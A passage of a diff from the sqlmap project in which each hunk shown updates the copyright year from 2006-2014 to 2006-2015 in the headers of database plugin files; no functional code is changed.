--- a/plugins/dbms/firebird/filesystem.py
+++ b/plugins/dbms/firebird/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py
index 4973e56e4..8a8de5c70 100644
--- a/plugins/dbms/firebird/fingerprint.py
+++ b/plugins/dbms/firebird/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py
index 6bc000fc5..c59666ade 100644
--- a/plugins/dbms/firebird/syntax.py
+++ b/plugins/dbms/firebird/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py
index 7ebfc4217..78589f5a4 100644
--- a/plugins/dbms/firebird/takeover.py
+++ b/plugins/dbms/firebird/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/__init__.py b/plugins/dbms/hsqldb/__init__.py
index fa7a4265f..128704f61 100644
--- a/plugins/dbms/hsqldb/__init__.py
+++ b/plugins/dbms/hsqldb/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py
index ed5c8b108..0496badb4 100644
--- a/plugins/dbms/hsqldb/connector.py
+++ b/plugins/dbms/hsqldb/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py
index c3b9f31e7..9bf2b9b23 100644
--- a/plugins/dbms/hsqldb/enumeration.py
+++ b/plugins/dbms/hsqldb/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py
index 9bb30d4b3..3e9dd9026 100644
--- a/plugins/dbms/hsqldb/filesystem.py
+++ b/plugins/dbms/hsqldb/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py
index bd3e0f6f7..9f527a601 100644
--- a/plugins/dbms/hsqldb/fingerprint.py
+++ b/plugins/dbms/hsqldb/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/syntax.py b/plugins/dbms/hsqldb/syntax.py
index e465100fe..c2927406b 100644
--- a/plugins/dbms/hsqldb/syntax.py
+++ b/plugins/dbms/hsqldb/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/takeover.py b/plugins/dbms/hsqldb/takeover.py
index e8e87336a..6d007a6b2 100644
--- a/plugins/dbms/hsqldb/takeover.py
+++ b/plugins/dbms/hsqldb/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/__init__.py b/plugins/dbms/maxdb/__init__.py
index 70259d523..9370a87c6 100644
--- a/plugins/dbms/maxdb/__init__.py
+++ b/plugins/dbms/maxdb/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py
index adf4a75c9..1f9feca61 100644
--- a/plugins/dbms/maxdb/connector.py
+++ b/plugins/dbms/maxdb/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py
index 1a784d5a0..95ec6a385 100644
--- a/plugins/dbms/maxdb/enumeration.py
+++ b/plugins/dbms/maxdb/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/filesystem.py b/plugins/dbms/maxdb/filesystem.py
index 89346627d..00d14a7f0 100644
--- a/plugins/dbms/maxdb/filesystem.py
+++ b/plugins/dbms/maxdb/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py
index be64c61b5..57f24fb88 100644
--- a/plugins/dbms/maxdb/fingerprint.py
+++ b/plugins/dbms/maxdb/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/syntax.py b/plugins/dbms/maxdb/syntax.py
index ff0b61602..b8612b3a1 100644
--- a/plugins/dbms/maxdb/syntax.py
+++ b/plugins/dbms/maxdb/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/takeover.py b/plugins/dbms/maxdb/takeover.py
index 45d0eca93..32d3a0969 100644
--- a/plugins/dbms/maxdb/takeover.py
+++ b/plugins/dbms/maxdb/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py
index d5eb669c8..c701c0f9f 100644
--- a/plugins/dbms/mssqlserver/__init__.py
+++ b/plugins/dbms/mssqlserver/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py
index e935eef84..657d796fd 100644
--- a/plugins/dbms/mssqlserver/connector.py
+++ b/plugins/dbms/mssqlserver/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py
index 57a6ef7fb..12e51a317 100644
--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py
index 577fd923b..3e8cfb4f6 100644
--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py
index 33a7f5de8..8483b6429 100644
--- a/plugins/dbms/mssqlserver/fingerprint.py
+++ b/plugins/dbms/mssqlserver/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mssqlserver/syntax.py b/plugins/dbms/mssqlserver/syntax.py
index 7918613a4..314ba5c8d 100644
--- a/plugins/dbms/mssqlserver/syntax.py
+++ b/plugins/dbms/mssqlserver/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py
index 2f3df49f1..e387d4095 100644
--- a/plugins/dbms/mssqlserver/takeover.py
+++ b/plugins/dbms/mssqlserver/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py
index fdf2ef1ea..7baec6ce9 100644
--- a/plugins/dbms/mysql/__init__.py
+++ b/plugins/dbms/mysql/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py
index 657b8af5a..62e073425 100644
--- a/plugins/dbms/mysql/connector.py
+++ b/plugins/dbms/mysql/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/enumeration.py b/plugins/dbms/mysql/enumeration.py
index f8044a604..6480d9c7b 100644
--- a/plugins/dbms/mysql/enumeration.py
+++ b/plugins/dbms/mysql/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py
index 4944a9c5e..5e10266a9 100644
--- a/plugins/dbms/mysql/filesystem.py
+++ b/plugins/dbms/mysql/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py
index 9c87d62c0..700badb4f 100644
--- a/plugins/dbms/mysql/fingerprint.py
+++ b/plugins/dbms/mysql/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/syntax.py b/plugins/dbms/mysql/syntax.py
index 6dfe3bb58..e593a51fb 100644
--- a/plugins/dbms/mysql/syntax.py
+++ b/plugins/dbms/mysql/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py
index 000b03246..a0ac94330 100644
--- a/plugins/dbms/mysql/takeover.py
+++ b/plugins/dbms/mysql/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/__init__.py b/plugins/dbms/oracle/__init__.py
index 5bd61bc79..165f92702 100644
--- a/plugins/dbms/oracle/__init__.py
+++ b/plugins/dbms/oracle/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py
index 6d73fe55d..3777689f4 100644
--- a/plugins/dbms/oracle/connector.py
+++ b/plugins/dbms/oracle/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py
index 2db7befff..b9318d17f 100644
--- a/plugins/dbms/oracle/enumeration.py
+++ b/plugins/dbms/oracle/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py
index d36bd7187..0428e3fdb 100644
--- a/plugins/dbms/oracle/filesystem.py
+++ b/plugins/dbms/oracle/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py
index 404bbbb6d..4b56b3122 100644
--- a/plugins/dbms/oracle/fingerprint.py
+++ b/plugins/dbms/oracle/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/syntax.py b/plugins/dbms/oracle/syntax.py
index c751350c3..41d2e9df5 100644
--- a/plugins/dbms/oracle/syntax.py
+++ b/plugins/dbms/oracle/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py
index e8102a43d..1781cd9e0 100644
--- a/plugins/dbms/oracle/takeover.py
+++ b/plugins/dbms/oracle/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py
index 1972cff2f..561b13572 100644
--- a/plugins/dbms/postgresql/__init__.py
+++ b/plugins/dbms/postgresql/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/connector.py b/plugins/dbms/postgresql/connector.py
index 2789dafa1..e60e7777a 100644
--- a/plugins/dbms/postgresql/connector.py
+++ b/plugins/dbms/postgresql/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/enumeration.py b/plugins/dbms/postgresql/enumeration.py
index bcac4ccc8..d379c2512 100644
--- a/plugins/dbms/postgresql/enumeration.py
+++ b/plugins/dbms/postgresql/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py
index f0ea52c42..e45be204b 100644
--- a/plugins/dbms/postgresql/filesystem.py
+++ b/plugins/dbms/postgresql/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py
index a9f754df1..3391f711e 100644
--- a/plugins/dbms/postgresql/fingerprint.py
+++ b/plugins/dbms/postgresql/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py
index 2fd8edebc..7bb904625 100644
--- a/plugins/dbms/postgresql/syntax.py
+++ b/plugins/dbms/postgresql/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py
index 7da0ea1b2..0e4794acd 100644
--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/__init__.py b/plugins/dbms/sqlite/__init__.py
index 047b547ca..0f7dcab83 100644
--- a/plugins/dbms/sqlite/__init__.py
+++ b/plugins/dbms/sqlite/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py
index dfe9dcf4a..dae2a3e78 100644
--- a/plugins/dbms/sqlite/connector.py
+++ b/plugins/dbms/sqlite/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py
index e0b07881a..db1d3c954 100644
--- a/plugins/dbms/sqlite/enumeration.py
+++ b/plugins/dbms/sqlite/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/filesystem.py b/plugins/dbms/sqlite/filesystem.py
index 8a0416dd5..ed1e5c152 100644
--- a/plugins/dbms/sqlite/filesystem.py
+++ b/plugins/dbms/sqlite/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py
index 41b2db01a..6c42a6374 100644
--- a/plugins/dbms/sqlite/fingerprint.py
+++ b/plugins/dbms/sqlite/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/syntax.py b/plugins/dbms/sqlite/syntax.py
index f1909779f..53c54f9f6 100644
--- a/plugins/dbms/sqlite/syntax.py
+++ b/plugins/dbms/sqlite/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py
index b9e06ded6..65fe09792 100644
--- a/plugins/dbms/sqlite/takeover.py
+++ b/plugins/dbms/sqlite/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/__init__.py b/plugins/dbms/sybase/__init__.py
index a3f980413..b2df16926 100644
--- a/plugins/dbms/sybase/__init__.py
+++ b/plugins/dbms/sybase/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py
index 56017af6d..3b1c7be75 100644
--- a/plugins/dbms/sybase/connector.py
+++ b/plugins/dbms/sybase/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py
index 128819104..09a0356af 100644
--- a/plugins/dbms/sybase/enumeration.py
+++ b/plugins/dbms/sybase/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/filesystem.py b/plugins/dbms/sybase/filesystem.py
index 01a344185..c5dbc6943 100644
--- a/plugins/dbms/sybase/filesystem.py
+++ b/plugins/dbms/sybase/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py
index b072a3ace..762ab95eb 100644
--- a/plugins/dbms/sybase/fingerprint.py
+++ b/plugins/dbms/sybase/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/syntax.py b/plugins/dbms/sybase/syntax.py
index 03f0767ed..a0f1775d4 100644
--- a/plugins/dbms/sybase/syntax.py
+++ b/plugins/dbms/sybase/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py
index 0fae2149f..9a9dfd7c4 100644
--- a/plugins/dbms/sybase/takeover.py
+++ b/plugins/dbms/sybase/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/__init__.py b/plugins/generic/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/plugins/generic/__init__.py
+++ b/plugins/generic/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py
index c039304f3..7bce4748c 100644
--- a/plugins/generic/connector.py
+++ b/plugins/generic/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py
index 62948c656..2871d90c4 100644
--- a/plugins/generic/custom.py
+++ b/plugins/generic/custom.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
